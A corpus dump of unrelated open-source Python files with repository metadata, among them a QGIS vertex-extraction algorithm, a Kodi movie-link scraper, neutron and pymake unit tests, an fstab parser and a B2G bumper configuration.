model = TypeUnique
type_registry.register(Type1Type)
type_registry.register(Type2Type)
type_registry.register(TestFileType)
type_registry.register(TestImageType)
type_registry.register(OtherTestFileType)
type_registry.register(OtherTestImageType)
type_registry.register(TypeM2MType)
type_registry.register(TypeUniqueType)
from wheelcms_axle.models import Configuration as BaseConfiguration
from wheelcms_axle.registries.configuration import configuration_registry
class Configuration(models.Model):
main = models.ForeignKey(BaseConfiguration, related_name="testconf")
value = models.TextField(blank=True)
configuration_registry.register("testconf", "ConfTest", Configuration, None)
|
wheelcms/wheelcms_axle
|
wheelcms_axle/tests/models.py
|
Python
|
bsd-2-clause
| 2,181 | 0.006419 |
# -*- coding: utf-8 -*-
"""
***************************************************************************
ExtractSpecificVertices.py
--------------------
Date : October 2016
Copyright : (C) 2016 by Nyall Dawson
Email : nyall dot dawson at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Nyall Dawson'
__date__ = 'October 2016'
__copyright__ = '(C) 2016, Nyall Dawson'
import math
from processing.algs.qgis.QgisAlgorithm import QgisAlgorithm
from qgis.core import (QgsWkbTypes,
QgsVertexId,
QgsFeature,
QgsFeatureSink,
QgsFeatureRequest,
QgsGeometry,
QgsField,
QgsProcessing,
QgsProcessingFeatureSource,
QgsProcessingParameterFeatureSource,
QgsProcessingParameterString,
QgsProcessingParameterFeatureSink,
QgsProcessingException)
from qgis.PyQt.QtCore import QVariant
class ExtractSpecificVertices(QgisAlgorithm):
INPUT = 'INPUT'
OUTPUT = 'OUTPUT'
VERTICES = 'VERTICES'
def group(self):
return self.tr('Vector geometry')
def groupId(self):
return 'vectorgeometry'
def __init__(self):
super().__init__()
def initAlgorithm(self, config=None):
self.addParameter(QgsProcessingParameterFeatureSource(self.INPUT,
self.tr('Input layer'), [QgsProcessing.TypeVectorAnyGeometry]))
self.addParameter(QgsProcessingParameterString(self.VERTICES,
self.tr('Vertex indices'), defaultValue='0'))
self.addParameter(QgsProcessingParameterFeatureSink(self.OUTPUT, self.tr('Vertices'), QgsProcessing.TypeVectorPoint))
def name(self):
return 'extractspecificvertices'
def displayName(self):
return self.tr('Extract specific vertices')
def tags(self):
return self.tr('points,vertex,nodes').split(',')
def processAlgorithm(self, parameters, context, feedback):
source = self.parameterAsSource(parameters, self.INPUT, context)
if source is None:
raise QgsProcessingException(self.invalidSourceError(parameters, self.INPUT))
fields = source.fields()
fields.append(QgsField('vertex_pos', QVariant.Int))
fields.append(QgsField('vertex_index', QVariant.Int))
fields.append(QgsField('vertex_part', QVariant.Int))
if QgsWkbTypes.geometryType(source.wkbType()) == QgsWkbTypes.PolygonGeometry:
fields.append(QgsField('vertex_part_ring', QVariant.Int))
fields.append(QgsField('vertex_part_index', QVariant.Int))
fields.append(QgsField('distance', QVariant.Double))
fields.append(QgsField('angle', QVariant.Double))
wkb_type = QgsWkbTypes.Point
if QgsWkbTypes.hasM(source.wkbType()):
wkb_type = QgsWkbTypes.addM(wkb_type)
if QgsWkbTypes.hasZ(source.wkbType()):
wkb_type = QgsWkbTypes.addZ(wkb_type)
(sink, dest_id) = self.parameterAsSink(parameters, self.OUTPUT, context,
fields, wkb_type, source.sourceCrs(), QgsFeatureSink.RegeneratePrimaryKey)
if sink is None:
raise QgsProcessingException(self.invalidSinkError(parameters, self.OUTPUT))
vertex_indices_string = self.parameterAsString(parameters, self.VERTICES, context)
indices = []
for vertex in vertex_indices_string.split(','):
try:
indices.append(int(vertex))
except:
raise QgsProcessingException(
self.tr('\'{}\' is not a valid vertex index').format(vertex))
features = source.getFeatures(QgsFeatureRequest(), QgsProcessingFeatureSource.FlagSkipGeometryValidityChecks)
total = 100.0 / source.featureCount() if source.featureCount() else 0
for current, f in enumerate(features):
if feedback.isCanceled():
break
input_geometry = f.geometry()
if not input_geometry:
sink.addFeature(f, QgsFeatureSink.FastInsert)
else:
total_vertices = input_geometry.constGet().nCoordinates()
for vertex in indices:
if vertex < 0:
vertex_index = total_vertices + vertex
else:
vertex_index = vertex
if vertex_index < 0 or vertex_index >= total_vertices:
continue
(success, vertex_id) = input_geometry.vertexIdFromVertexNr(vertex_index)
distance = input_geometry.distanceToVertex(vertex_index)
angle = math.degrees(input_geometry.angleAtVertex(vertex_index))
output_feature = QgsFeature()
attrs = f.attributes()
attrs.append(vertex)
attrs.append(vertex_index)
attrs.append(vertex_id.part)
if QgsWkbTypes.geometryType(source.wkbType()) == QgsWkbTypes.PolygonGeometry:
attrs.append(vertex_id.ring)
attrs.append(vertex_id.vertex)
attrs.append(distance)
attrs.append(angle)
output_feature.setAttributes(attrs)
point = input_geometry.vertexAt(vertex_index)
output_feature.setGeometry(QgsGeometry(point))
sink.addFeature(output_feature, QgsFeatureSink.FastInsert)
feedback.setProgress(int(current * total))
return {self.OUTPUT: dest_id}
|
mhugo/QGIS
|
python/plugins/processing/algs/qgis/ExtractSpecificVertices.py
|
Python
|
gpl-2.0
| 6,483 | 0.002314 |
# -*- coding: utf-8 -*-
'''
Exodus Add-on
Copyright (C) 2016 Exodus
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import re,urllib,urlparse
from resources.lib.modules import cleantitle
from resources.lib.modules import client
from resources.lib.modules import debrid
class source:
def __init__(self):
self.domains = ['perfecthdmovies.pw']
self.base_link = 'http://www.perfecthdmovies.pw'
self.search_link = '/search/%s/feed/rss2/'
def movie(self, imdb, title, year):
try:
url = {'imdb': imdb, 'title': title, 'year': year}
url = urllib.urlencode(url)
return url
except:
return
def tvshow(self, imdb, tvdb, tvshowtitle, year):
try:
url = {'imdb': imdb, 'tvdb': tvdb, 'tvshowtitle': tvshowtitle, 'year': year}
url = urllib.urlencode(url)
return url
except:
return
def episode(self, url, imdb, tvdb, title, premiered, season, episode):
try:
if url == None: return
url = urlparse.parse_qs(url)
url = dict([(i, url[i][0]) if url[i] else (i, '') for i in url])
url['title'], url['premiered'], url['season'], url['episode'] = title, premiered, season, episode
url = urllib.urlencode(url)
return url
except:
return
def sources(self, url, hostDict, hostprDict):
try:
sources = []
if url == None: return sources
if debrid.status() == False: raise Exception()
data = urlparse.parse_qs(url)
data = dict([(i, data[i][0]) if data[i] else (i, '') for i in data])
title = data['tvshowtitle'] if 'tvshowtitle' in data else data['title']
hdlr = 'S%02dE%02d' % (int(data['season']), int(data['episode'])) if 'tvshowtitle' in data else data['year']
query = '%s S%02dE%02d' % (data['tvshowtitle'], int(data['season']), int(data['episode'])) if 'tvshowtitle' in data else '%s %s' % (data['title'], data['year'])
query = re.sub('(\\\|/| -|:|;|\*|\?|"|\'|<|>|\|)', ' ', query)
url = self.search_link % urllib.quote_plus(query)
url = urlparse.urljoin(self.base_link, url)
r = client.request(url)
posts = client.parseDOM(r, 'item')
hostDict = hostprDict + hostDict
items = []
for post in posts:
try:
t = client.parseDOM(post, 'title')[0]
u = post.split('Download%252BLinks.png', 1)[-1]
u = client.parseDOM(u, 'div', attrs={'style': '.+?'})
u = [re.findall('<a href="(.+?)"', i) for i in u]
u = [i[0] for i in u if i]
items += [(t, i) for i in u]
except:
pass
for item in items:
try:
name = item[0]
name = client.replaceHTMLCodes(name)
t = re.sub('(\.|\(|\[|\s)(\d{4}|S\d*E\d*|S\d*|3D)(\.|\)|\]|\s|)(.+|)', '', name)
if not cleantitle.get(t) == cleantitle.get(title): raise Exception()
y = re.findall('[\.|\(|\[|\s](\d{4}|S\d*E\d*|S\d*)[\.|\)|\]|\s]', name)[-1].upper()
if not y == hdlr: raise Exception()
fmt = re.sub('(.+)(\.|\(|\[|\s)(\d{4}|S\d*E\d*|S\d*)(\.|\)|\]|\s)', '', name.upper())
fmt = re.split('\.|\(|\)|\[|\]|\s|\-', fmt)
fmt = [i.lower() for i in fmt]
if any(i.endswith(('subs', 'sub', 'dubbed', 'dub')) for i in fmt): raise Exception()
if any(i in ['extras'] for i in fmt): raise Exception()
if 'hindi' in fmt and not 'dual' in fmt: raise Exception()
if '1080p' in fmt: quality = '1080p'
elif '720p' in fmt: quality = 'HD'
else: quality = 'SD'
if any(i in ['dvdscr', 'r5', 'r6'] for i in fmt): quality = 'SCR'
elif any(i in ['camrip', 'tsrip', 'hdcam', 'hdts', 'dvdcam', 'dvdts', 'cam', 'telesync', 'ts'] for i in fmt): quality = 'CAM'
info = []
if '3d' in fmt: info.append('3D')
try:
size = re.findall('((?:\d+\.\d+|\d+\,\d+|\d+)(?:Gb|mb))', name)[-1]
div = 1 if size.endswith('Gb') else 1024
size = float(re.sub('[^0-9|/.|/,]', '', size))/div
size = '%.2f GB' % size
info.append(size)
except:
pass
if any(i in ['hevc', 'h265', 'x265'] for i in fmt): info.append('HEVC')
info = ' | '.join(info)
url = item[1]
if any(x in url for x in ['.rar', '.zip', '.iso']): raise Exception()
url = client.replaceHTMLCodes(url)
url = url.encode('utf-8')
host = re.findall('([\w]+[.][\w]+)$', urlparse.urlparse(url.strip().lower()).netloc)[0]
if not host in hostDict: raise Exception()
host = client.replaceHTMLCodes(host)
host = host.encode('utf-8')
sources.append({'source': host, 'quality': quality, 'provider': 'Phdmovies', 'url': url, 'info': info, 'direct': False, 'debridonly': True})
except:
pass
check = [i for i in sources if not i['quality'] == 'CAM']
if check: sources = check
return sources
except:
return sources
def resolve(self, url):
return url
|
JamesLinEngineer/RKMC
|
addons/plugin.video.phstreams/resources/lib/sources/phdmovies_mv_tv.py
|
Python
|
gpl-2.0
| 6,645 | 0.017306 |
# Copyright (c) 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Unit Tests for ml2 rpc
"""
import mock
from neutron.agent import rpc as agent_rpc
from neutron.common import topics
from neutron.openstack.common import context
from neutron.plugins.ml2.drivers import type_tunnel
from neutron.plugins.ml2 import rpc as plugin_rpc
from neutron.tests import base
class RpcApiTestCase(base.BaseTestCase):
def _test_rpc_api(self, rpcapi, topic, method, rpc_method, fanout,
**kwargs):
ctxt = context.RequestContext('fake_user', 'fake_project')
expected_retval = 'foo' if method == 'call' else None
expected_msg = kwargs.copy()
with mock.patch.object(rpcapi.client, 'prepare') as mock_prepare:
rpc_method_mock = getattr(mock_prepare.return_value, rpc_method)
rpc_method_mock.return_value = expected_retval
retval = getattr(rpcapi, method)(ctxt, **kwargs)
self.assertEqual(expected_retval, retval)
expected_prepare_args = {}
if fanout:
expected_prepare_args['fanout'] = fanout
if topic != topics.PLUGIN:
expected_prepare_args['topic'] = topic
mock_prepare.assert_called_with(**expected_prepare_args)
rpc_method_mock = getattr(mock_prepare.return_value, rpc_method)
rpc_method_mock.assert_called_with(
ctxt,
method,
**expected_msg)
def test_delete_network(self):
rpcapi = plugin_rpc.AgentNotifierApi(topics.AGENT)
self._test_rpc_api(rpcapi,
topics.get_topic_name(topics.AGENT,
topics.NETWORK,
topics.DELETE),
'network_delete', rpc_method='cast', fanout=True,
network_id='fake_request_spec')
def test_port_update(self):
rpcapi = plugin_rpc.AgentNotifierApi(topics.AGENT)
self._test_rpc_api(rpcapi,
topics.get_topic_name(topics.AGENT,
topics.PORT,
topics.UPDATE),
'port_update', rpc_method='cast', fanout=True,
port='fake_port',
network_type='fake_network_type',
segmentation_id='fake_segmentation_id',
physical_network='fake_physical_network')
def test_tunnel_update(self):
rpcapi = plugin_rpc.AgentNotifierApi(topics.AGENT)
self._test_rpc_api(rpcapi,
topics.get_topic_name(topics.AGENT,
type_tunnel.TUNNEL,
topics.UPDATE),
'tunnel_update', rpc_method='cast', fanout=True,
tunnel_ip='fake_ip', tunnel_type='gre')
def test_device_details(self):
rpcapi = agent_rpc.PluginApi(topics.PLUGIN)
self._test_rpc_api(rpcapi, topics.PLUGIN,
'get_device_details', rpc_method='call',
fanout=False,
device='fake_device',
agent_id='fake_agent_id')
def test_update_device_down(self):
rpcapi = agent_rpc.PluginApi(topics.PLUGIN)
self._test_rpc_api(rpcapi, topics.PLUGIN,
'update_device_down', rpc_method='call',
fanout=False,
device='fake_device',
agent_id='fake_agent_id',
host='fake_host')
def test_tunnel_sync(self):
rpcapi = agent_rpc.PluginApi(topics.PLUGIN)
self._test_rpc_api(rpcapi, topics.PLUGIN,
'tunnel_sync', rpc_method='call',
fanout=False,
tunnel_ip='fake_tunnel_ip',
tunnel_type=None)
def test_update_device_up(self):
rpcapi = agent_rpc.PluginApi(topics.PLUGIN)
self._test_rpc_api(rpcapi, topics.PLUGIN,
'update_device_up', rpc_method='call',
fanout=False,
device='fake_device',
agent_id='fake_agent_id',
host='fake_host')
|
beagles/neutron_hacking
|
neutron/tests/unit/ml2/test_rpcapi.py
|
Python
|
apache-2.0
| 5,110 | 0 |
from .thetvdb import TheTVDB
from .tmdb import TheMDB
|
aminotti/converter
|
lib/scrapper/__init__.py
|
Python
|
gpl-3.0
| 54 | 0 |
import datetime
from judge.utils.timedelta import nice_repr
from . import registry
@registry.filter
def timedelta(value, display='long'):
if value is None:
return value
return nice_repr(value, display)
@registry.filter
def timestampdelta(value, display='long'):
value = datetime.timedelta(seconds=value)
return timedelta(value, display)
@registry.filter
def seconds(timedelta):
return timedelta.total_seconds()
@registry.filter
@registry.render_with('time-remaining-fragment.html')
def as_countdown(timedelta):
return {'countdown': timedelta}
|
DMOJ/site
|
judge/jinja2/timedelta.py
|
Python
|
agpl-3.0
| 584 | 0 |
from setuptools import setup, find_packages
__name__ = 'deanslist'
__version__ = '0.6'
setup(
name=__name__,
version=__version__,
url='https://github.com/donowsolutions/%s' % __name__,
author='Jonathan Elliott Blum',
author_email='jon@donowsolutions.com',
description='DeansList API wrapper',
license='MIT',
packages=['deanslist'],
install_requires=[
'requests >=2.10.0, <3',
],
keywords=['deanslist', 'api', 'wrapper'],
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Intended Audience :: Education',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Topic :: Education'
],
)
|
donowsolutions/deanslist
|
setup.py
|
Python
|
mit
| 1,127 | 0 |
"""
fstab - file ``/etc/fstab``
===========================
Parse the ``/etc/fstab`` file into a list of lines. Each line is a dictionary
of fields, named according to their definitions in ``man fstab``:
* ``fs_spec`` - the device to mount
* ``fs_file`` - the mount point
* ``fs_vfstype`` - the type of file system
* ``raw_fs_mntops`` - the mount options as a string
* ``fs_mntops`` - the mount options as a dictionary
* ``fs_freq`` - the dump frequency
* ``fs_passno`` - check the filesystem on reboot in this pass number
* ``raw`` - the RAW line which is useful to front-end
``fs_freq`` and ``fs_passno`` are recorded as integers if found, and zero if
not present.
The ``fs_mntops`` mount options are converted to a dictionary, so that each
option's value set to True so it can be conveniently searched.
This data, as above, is available in the ``data`` property:
* As wrapped as an AttributeDict, each column can also be accessed as a property
with the same name.
* The mount options are also an AttributeDict object with properties
corresponding to the common mount options.
The data for each mount point is also available via the ``mounted_on``
property; the data is the same as that stored in the ``data`` list.
Typical content of the ``fstab`` looks like::
#
# /etc/fstab
# Created by anaconda on Fri May 6 19:51:54 2016
#
/dev/mapper/rhel_hadoop--test--1-root / xfs defaults 0 0
UUID=2c839365-37c7-4bd5-ac47-040fba761735 /boot xfs defaults 0 0
/dev/mapper/rhel_hadoop--test--1-home /home xfs defaults 0 0
/dev/mapper/rhel_hadoop--test--1-swap swap swap defaults 0 0
/dev/sdb1 /hdfs/data1 xfs rw,relatime,seclabel,attr2,inode64,noquota 0 0
/dev/sdc1 /hdfs/data2 xfs rw,relatime,seclabel,attr2,inode64,noquota 0 0
/dev/sdd1 /hdfs/data3 xfs rw,relatime,seclabel,attr2,inode64,noquota 0 0
localhost:/ /mnt/hdfs nfs rw,vers=3,proto=tcp,nolock,timeo=600 0 0
/dev/mapper/vg0-lv2 /test1 ext4 defaults,data=writeback 1 1
nfs_hostname.redhat.com:/nfs_share/data /srv/rdu/cases/000 nfs ro,defaults,hard,intr,bg,noatime,nodev,nosuid,nfsvers=3,tcp,rsize=32768,wsize=32768 0
Examples:
>>> fstab = shared[FSTab]
>>> len(fstab)
9
>>> fstab.data[0]['fs_spec'] # Note that data is a list not a dict here
'/dev/mapper/rhel_hadoop--test--1-root'
>>> fstab.data[0].fs_spec
'/dev/mapper/rhel_hadoop--test--1-root'
>>> fstab.data[0].raw
'/dev/mapper/rhel_hadoop--test--1-root / xfs defaults 0 0'
>>> fstab.data[0].fs_mntops.defaults
True
>>> 'relatime' in fstab.data[0].fs_mntops
False
>>> fstab.data[0].fs_mntops.get('relatime')
None
>>> fstab.mounted_on['/hdfs/data3'].fs_spec
'/dev/sdd1'
"""
from collections import namedtuple
from .. import Parser, parser, get_active_lines, AttributeDict
from ..parsers import optlist_to_dict, parse_delimited_table, keyword_search
from insights.specs import fstab
FS_HEADINGS = "fs_spec fs_file fs_vfstype raw_fs_mntops fs_freq fs_passno"
type_info = namedtuple('type_info', field_names=['type', 'default'])
@parser(fstab)
class FSTab(Parser):
"""
Parse the content of ``/etc/fstab``.
This object provides the '__len__' and '__iter__' methods to allow it to
be used as a list to iterate over the ``data`` data, e.g.::
>>> if len(fstab) > 0:
>>> for fs in fstab:
>>> print fs.fs_file
>>> print fs.raw
Attributes:
data (list): a list of parsed fstab entries as AttributeDict objects.
mounted_on (dict): a dictionary of AttributeDict objects keyed on mount
point.
"""
def __len__(self):
return len(self.data)
def __iter__(self):
for row in self.data:
yield row
def parse_content(self, content):
"""
Parse each line in the file ``/etc/fstab``.
"""
fstab_output = parse_delimited_table([FS_HEADINGS] + get_active_lines(content))
self.data = []
for line in fstab_output:
line['fs_freq'] = int(line['fs_freq']) if 'fs_freq' in line else 0
line['fs_passno'] = int(line['fs_passno']) if 'fs_passno' in line else 0
# optlist_to_dict converts 'key=value' to key: value and
# 'key' to key: True
line['fs_mntops'] = AttributeDict(optlist_to_dict(line['raw_fs_mntops']))
# add `raw` here for displaying convenience on front-end
line['raw'] = [l for l in content if l.startswith(line['fs_spec'])][0]
self.data.append(AttributeDict(line))
# assert: all mount points of valid entries are unique by definition
self.mounted_on = dict((row.fs_file, row) for row in self.data)
def search(self, **kwargs):
"""
Search for the given key/value pairs in the data. Please refer to the
:py:meth:`insights.parsers.keyword_search` function documentation for
a more complete description of how to use this.
Fields that can be searched (as per ``man fstab``):
* ``fs_spec``: the block special or remote filesystem path or label.
* ``fs_file``: The mount point for the filesystem.
* ``fs_vfstype``: The file system type.
* ``fs_mntops``: The mount options. Since this is also a dictionary,
this can be searched using __contains - see the examples below.
* ``fs_freq``: The dump frequency - rarely used.
* ``fs_passno``: The pass for file system checks - rarely used.
Examples:
Search for the root file system:
``fstab.search(fs_file='/')``
Search for file systems mounted from a LABEL declaration
``fstab.search(fs_spec__startswith='LABEL=')``
Search for file systems that use the 'uid' mount option:
``fstab.search(fs_mntops__contains='uid')``
Search for XFS file systems using the 'relatime' option:
``fstab.search(fs_vfstype='xfs', fs_mntops__contains='relatime')``
"""
return keyword_search(self.data, **kwargs)
|
wcmitchell/insights-core
|
insights/parsers/fstab.py
|
Python
|
apache-2.0
| 6,335 | 0.00221 |
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
class BaseError(Exception):
"""Base error for all test runner errors."""
def __init__(self, message, is_infra_error=False):
super(BaseError, self).__init__(message)
self._is_infra_error = is_infra_error
self.message = message
def __eq__(self, other):
return (self.message == other.message
and self.is_infra_error == other.is_infra_error)
def __ne__(self, other):
return not self == other
@property
def is_infra_error(self):
"""Property to indicate if error was caused by an infrastructure issue."""
return self._is_infra_error
|
catapult-project/catapult
|
devil/devil/base_error.py
|
Python
|
bsd-3-clause
| 747 | 0.008032 |
#!/usr/bin/env python
config = {
"exes": {
# Get around the https warnings
"hg": ['/usr/local/bin/hg', "--config", "web.cacerts=/etc/pki/tls/certs/ca-bundle.crt"],
"hgtool.py": ["/usr/local/bin/hgtool.py"],
"gittool.py": ["/usr/local/bin/gittool.py"],
},
'gecko_pull_url': 'https://hg.mozilla.org/integration/b2g-inbound',
'gecko_push_url': 'ssh://hg.mozilla.org/integration/b2g-inbound',
'gecko_local_dir': 'b2g-inbound',
'manifests_repo': 'https://git.mozilla.org/b2g/b2g-manifest.git',
'manifests_revision': 'origin/master',
'hg_user': 'B2G Bumper Bot <release+b2gbumper@mozilla.com>',
"ssh_key": "~/.ssh/ffxbld_dsa",
"ssh_user": "ffxbld",
'hgtool_base_bundle_urls': ['https://ftp-ssl.mozilla.org/pub/mozilla.org/firefox/bundles'],
'gaia_repo_url': 'https://hg.mozilla.org/integration/gaia-central',
'gaia_revision_file': 'b2g/config/gaia.json',
'gaia_max_revisions': 5,
# Which git branch this hg repo corresponds to
'gaia_git_branch': 'master',
'gaia_mapper_project': 'gaia',
'mapper_url': 'http://cruncher.build.mozilla.org/mapper/{project}/{vcs}/{rev}',
'devices': {
'dolphin': {
'ignore_projects': ['gecko'],
'ignore_groups': ['darwin'],
},
'emulator-kk': {
'ignore_projects': ['gecko'],
'ignore_groups': ['darwin'],
},
'emulator-jb': {
'ignore_projects': ['gecko'],
'ignore_groups': ['darwin'],
},
'emulator-ics': {
'ignore_projects': ['gecko'],
'ignore_groups': ['darwin'],
'manifest_file': 'emulator.xml',
},
# Equivalent to emulator-ics - see bug 916134
# Remove once the above bug resolved
'emulator': {
'ignore_projects': ['gecko'],
'ignore_groups': ['darwin'],
'manifest_file': 'emulator.xml',
},
'flame': {
'ignore_projects': ['gecko'],
'ignore_groups': ['darwin'],
},
'flame-kk': {
'ignore_projects': ['gecko'],
'ignore_groups': ['darwin'],
},
'hamachi': {
'ignore_projects': ['gecko'],
'ignore_groups': ['darwin'],
},
'helix': {
'ignore_projects': ['gecko'],
'ignore_groups': ['darwin'],
},
'nexus-4': {
'ignore_projects': ['gecko'],
'ignore_groups': ['darwin'],
},
'wasabi': {
'ignore_projects': ['gecko'],
'ignore_groups': ['darwin'],
},
},
'repo_remote_mappings': {
'https://android.googlesource.com/': 'https://git.mozilla.org/external/aosp',
'git://codeaurora.org/': 'https://git.mozilla.org/external/caf',
'git://github.com/mozilla-b2g/': 'https://git.mozilla.org/b2g',
'git://github.com/mozilla/': 'https://git.mozilla.org/b2g',
'https://git.mozilla.org/releases': 'https://git.mozilla.org/releases',
'http://android.git.linaro.org/git-ro/': 'https://git.mozilla.org/external/linaro',
'http://sprdsource.spreadtrum.com:8085/b2g/android': 'https://git.mozilla.org/external/sprd-aosp',
'git://github.com/apitrace/': 'https://git.mozilla.org/external/apitrace',
'git://github.com/t2m-foxfone/': 'https://git.mozilla.org/external/t2m-foxfone',
# Some mappings to ourself, we want to leave these as-is!
'https://git.mozilla.org/external/aosp': 'https://git.mozilla.org/external/aosp',
'https://git.mozilla.org/external/caf': 'https://git.mozilla.org/external/caf',
'https://git.mozilla.org/b2g': 'https://git.mozilla.org/b2g',
'https://git.mozilla.org/external/apitrace': 'https://git.mozilla.org/external/apitrace',
'https://git.mozilla.org/external/t2m-foxfone': 'https://git.mozilla.org/external/t2m-foxfone',
},
}
|
kartikgupta0909/gittest
|
configs/b2g_bumper/master.py
|
Python
|
mpl-2.0
| 3,963 | 0.003028 |
import pymake.data, pymake.functions, pymake.util
import unittest
import re
def multitest(cls):
for name in cls.testdata.keys():
def m(self, name=name):
return self.runSingle(*self.testdata[name])
setattr(cls, 'test_%s' % name, m)
return cls
class SplitWordsTest(unittest.TestCase):
testdata = (
(' test test.c test.o ', ['test', 'test.c', 'test.o']),
('\ttest\t test.c \ntest.o', ['test', 'test.c', 'test.o']),
)
def runTest(self):
for s, e in self.testdata:
w = s.split()
self.assertEqual(w, e, 'splitwords(%r)' % (s,))
class GetPatSubstTest(unittest.TestCase):
testdata = (
('%.c', '%.o', ' test test.c test.o ', 'test test.o test.o'),
('%', '%.o', ' test.c test.o ', 'test.c.o test.o.o'),
('foo', 'bar', 'test foo bar', 'test bar bar'),
('foo', '%bar', 'test foo bar', 'test %bar bar'),
('%', 'perc_%', 'path', 'perc_path'),
('\\%', 'sub%', 'p %', 'p sub%'),
('%.c', '\\%%.o', 'foo.c bar.o baz.cpp', '%foo.o bar.o baz.cpp'),
)
def runTest(self):
for s, r, d, e in self.testdata:
words = d.split()
p = pymake.data.Pattern(s)
a = ' '.join((p.subst(r, word, False)
for word in words))
self.assertEqual(a, e, 'Pattern(%r).subst(%r, %r)' % (s, r, d))
class LRUTest(unittest.TestCase):
# getkey, expected, funccount, debugitems
expected = (
(0, '', 1, (0,)),
(0, '', 2, (0,)),
(1, ' ', 3, (1, 0)),
(1, ' ', 3, (1, 0)),
(0, '', 4, (0, 1)),
(2, ' ', 5, (2, 0, 1)),
(1, ' ', 5, (1, 2, 0)),
(3, ' ', 6, (3, 1, 2)),
)
def spaceFunc(self, l):
self.funccount += 1
return ''.ljust(l)
def runTest(self):
self.funccount = 0
c = pymake.util.LRUCache(3, self.spaceFunc, lambda k, v: k % 2)
self.assertEqual(tuple(c.debugitems()), ())
for i in range(0, len(self.expected)):
k, e, fc, di = self.expected[i]
v = c.get(k)
self.assertEqual(v, e)
self.assertEqual(self.funccount, fc,
"funccount, iteration %i, got %i expected %i" % (i, self.funccount, fc))
goti = tuple(c.debugitems())
self.assertEqual(goti, di,
"debugitems, iteration %i, got %r expected %r" % (i, goti, di))
class EqualityTest(unittest.TestCase):
def test_string_expansion(self):
s1 = pymake.data.StringExpansion('foo bar', None)
s2 = pymake.data.StringExpansion('foo bar', None)
self.assertEqual(s1, s2)
def test_expansion_simple(self):
s1 = pymake.data.Expansion(None)
s2 = pymake.data.Expansion(None)
self.assertEqual(s1, s2)
s1.appendstr('foo')
s2.appendstr('foo')
self.assertEqual(s1, s2)
def test_expansion_string_finish(self):
"""Adjacent strings should normalize to same value."""
s1 = pymake.data.Expansion(None)
s2 = pymake.data.Expansion(None)
s1.appendstr('foo')
s2.appendstr('foo')
s1.appendstr(' bar')
s1.appendstr(' baz')
s2.appendstr(' bar baz')
self.assertEqual(s1, s2)
def test_function(self):
s1 = pymake.data.Expansion(None)
s2 = pymake.data.Expansion(None)
n1 = pymake.data.StringExpansion('FOO', None)
n2 = pymake.data.StringExpansion('FOO', None)
v1 = pymake.functions.VariableRef(None, n1)
v2 = pymake.functions.VariableRef(None, n2)
s1.appendfunc(v1)
s2.appendfunc(v2)
self.assertEqual(s1, s2)
class StringExpansionTest(unittest.TestCase):
def test_base_expansion_interface(self):
s1 = pymake.data.StringExpansion('FOO', None)
self.assertTrue(s1.is_static_string)
funcs = list(s1.functions())
self.assertEqual(len(funcs), 0)
funcs = list(s1.functions(True))
self.assertEqual(len(funcs), 0)
refs = list(s1.variable_references())
self.assertEqual(len(refs), 0)
class ExpansionTest(unittest.TestCase):
def test_is_static_string(self):
e1 = pymake.data.Expansion()
e1.appendstr('foo')
self.assertTrue(e1.is_static_string)
e1.appendstr('bar')
self.assertTrue(e1.is_static_string)
vname = pymake.data.StringExpansion('FOO', None)
func = pymake.functions.VariableRef(None, vname)
e1.appendfunc(func)
self.assertFalse(e1.is_static_string)
def test_get_functions(self):
e1 = pymake.data.Expansion()
e1.appendstr('foo')
vname1 = pymake.data.StringExpansion('FOO', None)
vname2 = pymake.data.StringExpansion('BAR', None)
func1 = pymake.functions.VariableRef(None, vname1)
func2 = pymake.functions.VariableRef(None, vname2)
e1.appendfunc(func1)
e1.appendfunc(func2)
funcs = list(e1.functions())
self.assertEqual(len(funcs), 2)
func3 = pymake.functions.SortFunction(None)
func3.append(vname1)
e1.appendfunc(func3)
funcs = list(e1.functions())
self.assertEqual(len(funcs), 3)
refs = list(e1.variable_references())
self.assertEqual(len(refs), 2)
def test_get_functions_descend(self):
e1 = pymake.data.Expansion()
vname1 = pymake.data.StringExpansion('FOO', None)
func1 = pymake.functions.VariableRef(None, vname1)
e2 = pymake.data.Expansion()
e2.appendfunc(func1)
func2 = pymake.functions.SortFunction(None)
func2.append(e2)
e1.appendfunc(func2)
funcs = list(e1.functions())
self.assertEqual(len(funcs), 1)
funcs = list(e1.functions(True))
self.assertEqual(len(funcs), 2)
self.assertTrue(isinstance(funcs[0], pymake.functions.SortFunction))
def test_is_filesystem_dependent(self):
e = pymake.data.Expansion()
vname1 = pymake.data.StringExpansion('FOO', None)
func1 = pymake.functions.VariableRef(None, vname1)
e.appendfunc(func1)
self.assertFalse(e.is_filesystem_dependent)
func2 = pymake.functions.WildcardFunction(None)
func2.append(vname1)
e.appendfunc(func2)
self.assertTrue(e.is_filesystem_dependent)
def test_is_filesystem_dependent_descend(self):
sort = pymake.functions.SortFunction(None)
wildcard = pymake.functions.WildcardFunction(None)
e = pymake.data.StringExpansion('foo/*', None)
wildcard.append(e)
e = pymake.data.Expansion(None)
e.appendfunc(wildcard)
sort.append(e)
e = pymake.data.Expansion(None)
e.appendfunc(sort)
